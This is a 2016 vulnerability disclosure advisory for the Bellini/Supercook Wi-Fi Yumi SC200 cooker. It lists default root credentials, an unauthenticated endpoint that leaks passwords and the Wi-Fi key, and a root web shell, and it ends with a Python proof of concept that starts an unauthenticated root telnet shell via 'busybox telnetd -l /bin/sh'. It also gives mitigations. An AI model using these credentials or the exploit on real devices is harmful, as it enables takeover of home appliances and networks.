Bellini/Supercook Wi-Fi Yumi SC200 Information Disclosure / Code Execution

2016-07-25T00:00:00
ID PACKETSTORM:138032
Type packetstorm
Reporter James McLean
Modified 2016-07-25T00:00:00

Description

                                        
                                            `Bellini/Supercook Wi-Fi Yumi SC200 - Multiple vulnerabilities  
  
Reported By:  
==================================  
James McLean -  
Primary: james dot mclean at gmail dot com  
Secondary: labs at juicedigital dot net  
  
Device Overview:  
==================================  
>From http://www.supercook.me/en/supercook/articles/btmkm800x/  
  
"The Bellini.SUPERCOOK Kitchen Master is much more than a multifunctional  
kitchen machine. It has 13 functions so not only saves a huge amount of  
time, it also incorporates the Yumi control module and its own recipe  
collection, making it incredibly easy to use."  
  
Vulnerability Overview:  
==================================  
Vuln1) Weak Username/Password for 'root' account.  
Vuln2) Information disclosure, unauthenticated.  
Vuln3) Remote arbitrary code execution.  
  
CVE ID's  
==================================  
None assigned as yet.  
  
Disclosure Timeline  
==================================  
2016-06-01: Vulnerability assessment commenced.  
2016-07-04: Contacted Supercook.me support via Web Contact. No response.  
2016-07-12: Contacted Supercook.me support via Web Contact. No response.  
2016-07-12: Contacted Supercook Australia via Facebook. Supercook  
responded, saying they will view the support request.  
No further response recieved.  
2016-07-19: Contacted Supercook Australia via Facebook. No response.  
2016-07-21: Posted security assessment to vortex.id.au.  
2016-07-22: Mitre contacted, CVE ID's requested.  
  
It is with regret, but ultimately due to my concern for the community  
that own these devices, that due to lack of communication I am disclosing  
these vulnerabilities without the involvment of the vendor. I sincerely hope  
that the vendor can resolve these issues in a timely manner.  
  
I intend no malice by releasing these vulnerabilities, and only wish to  
inform the community so appropriate steps may be taken by the owners of  
these devices.  
  
Due to the nature of the firmware on the device, these issues are not likely  
caused by the vendor themselves.  
  
Please do not use the information presented here for evil.  
  
Affected Platforms:  
==================================  
Bellini/Supercook Wi-Fi Yumi SC200 - Confirmed affected: Vuln1, Vuln2, Vuln3.  
Bellini/Supercook Wi-Fi Yumi SC250 - Likely affected, Vuln1, Vuln2, Vuln3, as  
same firmware is used.  
  
As the Wi-fi Yumi firmware appears to be based on a stock firmware image  
used on a number of other commodity 'IoT' devices, the vulnerabilities  
described here are very likely to affect other devices with similar or  
the same firmware.  
  
--  
  
Vuln1 Details:  
==================================  
Weak Username/Password for Root-level account.  
Username: super  
Password: super  
  
These credentials provide access to the built in FTP server and web  
administration interface. We did not attempt any more than a cursory  
connection to the FTP server with these details.  
  
According to the details disclosed in Vuln2, an additional account is present  
on the device with the following credentials:  
Username: admin  
Password: AlpheusDigital1010  
  
With the exception of a cursory check of the built in FTP service (which  
failed for these credentials), we did not attempt to access the device with  
these credentials.  
  
Vuln1 Notes:  
==================================  
We did not attempt to change or ascertain if it was possible to change these  
access credentials; as Vuln2 completely negates any change made.  
  
Vuln1 Mitigation:  
==================================  
Isolate the Supercook Wi-fi Yumi from any other Wireless network.  
Revert to the non-wifi Yumi controller.  
  
--  
  
Vuln2 Details:  
==================================  
Information disclosure, unauthenticated.  
  
Device URL: http://10.10.1.1/Setting.chipsipcmd  
  
The device offers, via its built in webserver, a full list of all configuration  
parameters available. This list includes the above mentioned root account  
username and password, and the password to the parent connected wifi network.  
All details are in plain text, and transmitted in the format of a key-value  
pair making retrieval, recovery and use of all configuration  
information trivial.  
  
This interface is also available from the parent wi-fi network via DHCP assigned  
IPv4 address.  
  
Vuln2 Notes:  
==================================  
Example data returned:  
DEF_IP_ADDR=10.10.1.1  
DEF_SUBNET_MASK=255.255.255.0  
...  
DEF_SUPER_NAME="super"  
DEF_SUPER_PASSWORD="super"  
DEF_USER_NAME="admin"  
DEF_USER_PASSWORD="AlpheusDigital1010"  
...  
  
Vuln2 Mitigation:  
==================================  
Isolate the Supercook Wi-fi Yumi from any other Wireless network, only using  
the mobile application to upload recipes, then disconnect from the device and  
connect your mobile device to a trusted network once again to access the  
internet once again.  
  
Revert to the non-wifi Yumi controller.  
  
The vendor should establish a method of authentication to the device from the  
various mobile applications available, and transport any configuration in an  
encrypted format using keys which are not generally available or easily  
discoverable.  
  
--  
  
Vuln3 Details:  
==================================  
Remote arbitrary code execution.  
  
Device URL: http://10.10.1.1/syscmd.asp  
  
The device offers a built-in web-shell which, once authenticated using the  
details discovered in Vuln2, allows the execution of any command the device  
can execute - as the built in webserver runs as the root user.  
  
It is possible to execute a command using this interface that would create  
any file in any location. This would allow an attacker to establish persistence.  
  
Additionally, the built in busybox binary includes the option  
'telnetd', meaning it is  
possible to execute the relevant command to start a telnet daemon remotely.  
The running daemon then requires no authentication to connect, and runs as  
the root account.  
  
Vuln3 Mitigation:  
==================================  
Isolate the Supercook Wi-fi Yumi from any other Wireless network.  
  
Revert to the non-wifi Yumi controller.  
  
Remove or prevent access to /syscmd.asp and /goform/formSysCmd scripts (Please  
mind your warranty if you modify the files on the device).  
  
The vendor should disable any and all commands on the device and scripts in  
the web interface which are not specifically required for the normal  
functionality of the device or its communication with control apps.  
  
In this instance, the vendor should REMOVE the page '/syscmd.asp' and also  
/goform/formSysCmd which processes commands submitted via syscmd.asp to prevent  
arbitrary commands from being executed.  
  
Additionally, busybox should be recompiled such that the 'telnetd' option is  
no longer available to be executed.  
  
--  
  
Vuln1/Vuln2/Vuln3 Risks:  
==================================  
Weak and easily discoverable root credentials combined with easily accessed  
remote shell functionality is a dangerous combination. These vulnerabilities  
could allow any sufficiently advanced malware to become persistent in a LAN  
and re-infect hosts at will (advanced crypto-locker style malware comes to  
mind), capture and exfiltrate data on either Wireless network the device is  
connected to, MITM any traffic routed through the device, or other as yet  
unknown attack vectors.  
  
Additionally, as full root access is easily obtainable, it may be possible  
for an attacker to cause the cooking functionality to behave erratically or  
possibly even dangerously due to the built in spinning blades and heating  
elements. While we ultimately did not attempt to control these aspects of the  
device due to the fact that it makes our dinner most nights, these risks are  
worth raising.  
  
This vulnerability assessment should not be considered an exhaustive list  
of all vunlnerabilities the device may have. Due to time constraints we were  
unable to invest the required time to discover and document all issues. Due to  
the nature of the firmware on the device, most of these have likely been  
discovered in other products at various times, this item may even duplicate  
another from a similar device.  
  
Notes:  
==================================  
No security assessment of code used for control of cooker functionality was  
undertaken; as this does not, in my opinion, rate as seriously as the other  
vulnerabilities discovered and disclosed here. However, it should be noted,  
that with the root access that is VERY easily obtained, it may be possible for  
an attacker to cause the cooking functionality of the machine to behave  
erratically or even dangerously due to the built in spinning blades and heating  
elements. Further to this, a malicious partner or offspring may intentionally  
sabotage dinner, if he/she would prefer to eat takeout.  
  
No attempt was made to connect to or manipulate files on the built in Samba  
shares, however given the weak credentials sufficiently advanced malware may be  
able to use these shares to establish persistence.  
  
The 'Bellini' name may be regional, our device was procured in Australia and  
as such may or may not have a different name in other countries.  
  
A full, detailed, rundown and commentary is available at  
https://www.vortex.id.au/2016/07/bellini-supercook-yumi-wi-fi-the-insecurity-perspective/  
  
Vuln3 Proof of Concept:  
==================================  
#!/usr/bin/env python  
  
import urllib  
import urllib2  
from subprocess import call  
  
# Connect to the device's wifi network, then run.  
# Root access will be provided.  
  
url = 'http://10.10.1.1/goform/formSysCmd'  
cmd = 'busybox telnetd -l /bin/sh'  
username = 'super'  
password = 'super'  
  
# setup the password handler  
basicauth = urllib2.HTTPPasswordMgrWithDefaultRealm()  
basicauth.add_password(None, url, username, password)  
  
authhandler = urllib2.HTTPBasicAuthHandler(basicauth)  
opener = urllib2.build_opener(authhandler)  
  
urllib2.install_opener(opener)  
  
# Connect to the device, send the data  
values = {  
'sysCmd': cmd,  
'apply': 'Apply',  
'submit-url': '/syscmd.asp'  
}  
data = urllib.urlencode(values)  
pagehandle = urllib2.urlopen(url, data)  
  
# Connect to Telnet.  
call(["telnet","10.10.1.1"])  
  
# Pwnd.  
  
# End of document.  
  
  
`